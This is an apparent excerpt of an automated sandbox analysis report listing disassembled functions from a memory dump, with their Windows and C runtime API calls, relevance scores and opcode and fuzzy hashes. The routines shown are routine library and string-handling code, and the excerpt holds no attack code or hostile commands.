                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00415201, Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041520B
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          • _wcsncpy.LIBCMT ref: 0041532F
                                                                                                                                                                          • _memmove.LIBCMT ref: 004153BE
                                                                                                                                                                          • _memmove.LIBCMT ref: 004153E3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeLastString_memmove$H_prolog3__wcsncpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 127149598-0
                                                                                                                                                                          • Opcode ID: 81cc97137daa34a53d89da4b4518bfc4a37484b26224423c17e63f71e04ad695
                                                                                                                                                                          • Instruction ID: d786ea617fbb343e346c3fd2af9d8db9753902622bade768ea54d7db4bbabdaf
                                                                                                                                                                          • Opcode Fuzzy Hash: 81cc97137daa34a53d89da4b4518bfc4a37484b26224423c17e63f71e04ad695
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C519F71900719DBDB24DF64CC91BEEB775BF40304F1482AEE419A7281EBB85A88CF59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00433509, Relevance: 6.1, APIs: 4, Instructions: 144COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00433513
                                                                                                                                                                            • Part of subcall function 004334DE: __EH_prolog3.LIBCMT ref: 004334E5
                                                                                                                                                                            • Part of subcall function 0040C2BB: __EH_prolog3.LIBCMT ref: 0040C2C2
                                                                                                                                                                            • Part of subcall function 004432A1: _malloc.LIBCMT ref: 004432B9
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00483E18,?,00000001), ref: 00433674
                                                                                                                                                                          • _memset.LIBCMT ref: 00433715
                                                                                                                                                                          • _memset.LIBCMT ref: 0043372D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_memset$FileH_prolog3_ModuleName_malloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1040074069-0
                                                                                                                                                                          • Opcode ID: dcb6e64cd704c0734b384761993b6c0215855e08e5d3571194c83f5fe99a920b
                                                                                                                                                                          • Instruction ID: 65642fd5371ddb9317ab123f19c9b813accfdf8c43ab9978d307675438de2c1b
                                                                                                                                                                          • Opcode Fuzzy Hash: dcb6e64cd704c0734b384761993b6c0215855e08e5d3571194c83f5fe99a920b
                                                                                                                                                                          • Instruction Fuzzy Hash: FE61B1B0904748DED720DF69C8857DAFBE4BF18304F5084AED09EA3281DB786A45CB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040EFA3, Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0040EFAA
                                                                                                                                                                          • _strlen.LIBCMT ref: 0040EFD7
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000008,00000000,?,00000001,00000000,00000000,00000044,0040EF7A,0047C4E4,?,00000000,00000008,00000040,invalid string position,?,0040EECA), ref: 0040EFF0
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000008,00000000,?,00000000,00000000,00000000,?,0040EECA,00000000,?,?,00000000,?,0040E94F,?), ref: 0040F01E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$H_prolog3__strlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 708778256-0
                                                                                                                                                                          • Opcode ID: 677c701de312e3921c8341d148b828ccc9366b1273f23519a3fbc29b4dd4de3c
                                                                                                                                                                          • Instruction ID: e7ae71468cb72755f7a4bce908d9373b338d6ab3cb70ae690776c1224aa6debc
                                                                                                                                                                          • Opcode Fuzzy Hash: 677c701de312e3921c8341d148b828ccc9366b1273f23519a3fbc29b4dd4de3c
                                                                                                                                                                          • Instruction Fuzzy Hash: A441EAB1900214ABDB14EFA9CC85EEE7778AF45324F10423EF911B72D2DB785D458B68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00411D8B, Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$Free$H_prolog3_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 332078091-0
                                                                                                                                                                          • Opcode ID: a17125eaaa028eb5d9674080e9b5322beb4c0e092eb0de1914406c73cb5bc084
                                                                                                                                                                          • Instruction ID: 99f2c5ddd7081a6fbebd99e35a655f583edc5eddb2a77b826fe2f5043d8735b3
                                                                                                                                                                          • Opcode Fuzzy Hash: a17125eaaa028eb5d9674080e9b5322beb4c0e092eb0de1914406c73cb5bc084
                                                                                                                                                                          • Instruction Fuzzy Hash: 74517B70D042199FDB24DFA4C881BDEBBB0BF04314F24819EE965A72E2DB785A85CF54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043DD4A, Relevance: 6.1, APIs: 4, Instructions: 107fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043DD51
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,00000044,0043DD41,?,00000000,?,?,?,?), ref: 0043DD98
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0043DDA5
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0043DE1F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateErrorFileH_prolog3_HandleLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3060235777-0
                                                                                                                                                                          • Opcode ID: b3c695aa09ccd2aac34e94e80b9c082afec2c1a732ca84e708b2a0db9c71e217
                                                                                                                                                                          • Instruction ID: 2badafb05afdb6c4757f28fbead458158b0e9df19cf42f72c0585eb2fc060204
                                                                                                                                                                          • Opcode Fuzzy Hash: b3c695aa09ccd2aac34e94e80b9c082afec2c1a732ca84e708b2a0db9c71e217
                                                                                                                                                                          • Instruction Fuzzy Hash: 1231A070E002549FEB24DFA5D845BAEBBB5EF48718F14402EF8416B2D1D7799C02CB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042FBDD, Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0042FBE4
                                                                                                                                                                            • Part of subcall function 0042F5A4: __EH_prolog3_GS.LIBCMT ref: 0042F5AB
                                                                                                                                                                            • Part of subcall function 0042F5A4: IsWindow.USER32(?), ref: 0042F5F1
                                                                                                                                                                            • Part of subcall function 0042F5A4: SendMessageW.USER32(?,00001061,?,00000008), ref: 0042F606
                                                                                                                                                                          • SendMessageW.USER32(?,0000101E,00000000,000000FE), ref: 0042FCBA
                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,00000020), ref: 0042FCD3
                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042FCE1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$H_prolog3_$Window
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1329796335-0
                                                                                                                                                                          • Opcode ID: 18c6e8b82b777e10afadd5bf395ae3e56be81eb9d655a24e07091cc1faab51d1
                                                                                                                                                                          • Instruction ID: bb494f6ecf274b54534cb3e8cba0565adfd70530a530d39ab3d3f46829ffe89c
                                                                                                                                                                          • Opcode Fuzzy Hash: 18c6e8b82b777e10afadd5bf395ae3e56be81eb9d655a24e07091cc1faab51d1
                                                                                                                                                                          • Instruction Fuzzy Hash: 8831DE31B00224ABCB11DF51DD51AEEBBB4AF05750F94003EF9457B2D1C7785845CB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043E66E, Relevance: 6.1, APIs: 4, Instructions: 97fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastRead_memset_strlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 908522378-0
                                                                                                                                                                          • Opcode ID: 96c4fbaf29496c56613da608499bcdc3d9d0b3de491213bf139302cabcdb5147
                                                                                                                                                                          • Instruction ID: 29e374f3cea47b04bc246f6bbb1b4aca9734333d4dcb24ac93908beac239baf2
                                                                                                                                                                          • Opcode Fuzzy Hash: 96c4fbaf29496c56613da608499bcdc3d9d0b3de491213bf139302cabcdb5147
                                                                                                                                                                          • Instruction Fuzzy Hash: 60316F75601209AFDB14DF6ACC84E9B7BAAEF88344B048429F819CB291D735ED11CB64
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004116BE, Relevance: 6.1, APIs: 4, Instructions: 89memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SysStringLen.OLEAUT32(00000001), ref: 004116F3
                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0041174B
                                                                                                                                                                          • SysStringLen.OLEAUT32(00000001), ref: 00411760
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000001), ref: 0041179D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$AllocFree
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 344208780-0
                                                                                                                                                                          • Opcode ID: cb22d3f160cd963155a7f0ec81e4d36ff3c191698e810ec4fcdcafad73882ba8
                                                                                                                                                                          • Instruction ID: ebac4bd09902137770d3daf899634149322960941cc7d1dbf3e2f10b5ae1d7e9
                                                                                                                                                                          • Opcode Fuzzy Hash: cb22d3f160cd963155a7f0ec81e4d36ff3c191698e810ec4fcdcafad73882ba8
                                                                                                                                                                          • Instruction Fuzzy Hash: B321E375900108FBDB109FA4DC81BAAB7B9AF04304F14842BFA19D6361E73ADA84CB54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00438E15, Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00438E1F
                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00438E75
                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,00000000,?,00000088,00438C38,00000000,00000000,00000000,00000000,00000000,0000000C,00438CFA), ref: 00438E81
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00438EC5
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 004339BD: __EH_prolog3.LIBCMT ref: 004339C4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3$ErrorException@8FileH_prolog3_LastPointerThrow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4022812620-0
                                                                                                                                                                          • Opcode ID: f9b846a0742d8d8dceeeb897006d1cb2cd0d275aa0b01c98d1b8eefa57e51fe6
                                                                                                                                                                          • Instruction ID: aea2f4e1e04f9cddd84b0b3f456c663f1031e1ff5a2354ee437618813a4cc696
                                                                                                                                                                          • Opcode Fuzzy Hash: f9b846a0742d8d8dceeeb897006d1cb2cd0d275aa0b01c98d1b8eefa57e51fe6
                                                                                                                                                                          • Instruction Fuzzy Hash: 08217C71900218EBDB10EFA0CC96FDEB378BB18315F40416AF616A71D1DBB49E45CB88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00402410, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(00483E18,00483E16,?,?,?,CC858012,?,?,00471468,000000FF), ref: 0040248B
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004024A7
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004024B2
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 004024D2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeLastString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3822639702-0
                                                                                                                                                                          • Opcode ID: 638cadda9960e9d26dd4ac7669427dd178c1dce3472d7886c8fcb029850e2969
                                                                                                                                                                          • Instruction ID: e89c768751c513207eb7c6f0e9dcb856c403105aa896598904ec2c3c7b796f53
                                                                                                                                                                          • Opcode Fuzzy Hash: 638cadda9960e9d26dd4ac7669427dd178c1dce3472d7886c8fcb029850e2969
                                                                                                                                                                          • Instruction Fuzzy Hash: 71213631600648AFCB049F28CD08B9A77E5FF08318F01823AEC19E72A1D739E944CB88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00404C70, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(00000001,749AD5B0,CC858012,?,74B04D40,?,?,00471888,000000FF,HsG,00403CD4), ref: 00404CE4
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 00404D32
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 1452528299-815662401
                                                                                                                                                                          • Opcode ID: f1f7f2cd7fef66fe514b8c4d763dab99e9f6b45e8f0dfbdcc5f3b0aaee8ae0b5
                                                                                                                                                                          • Instruction ID: 0facb828b6b6934bf470f3032e1fc4125c4f45a975a9da6af6faa08443be2ef1
                                                                                                                                                                          • Opcode Fuzzy Hash: f1f7f2cd7fef66fe514b8c4d763dab99e9f6b45e8f0dfbdcc5f3b0aaee8ae0b5
                                                                                                                                                                          • Instruction Fuzzy Hash: BD219C71504700AFDB10DF14C804B66BBF4FB49318F21866EE9199B381C77AE906CBD8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004146A1, Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTempPathW.KERNEL32(?,?,00000000,00000000,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5), ref: 004146C1
                                                                                                                                                                          • SetErrorMode.KERNEL32(00008003,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5,00000452,?,00000218), ref: 004146D0
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,?,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5,00000452,?), ref: 004146E7
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 00414704
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryErrorModePathTempWindowslstrcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3576100887-0
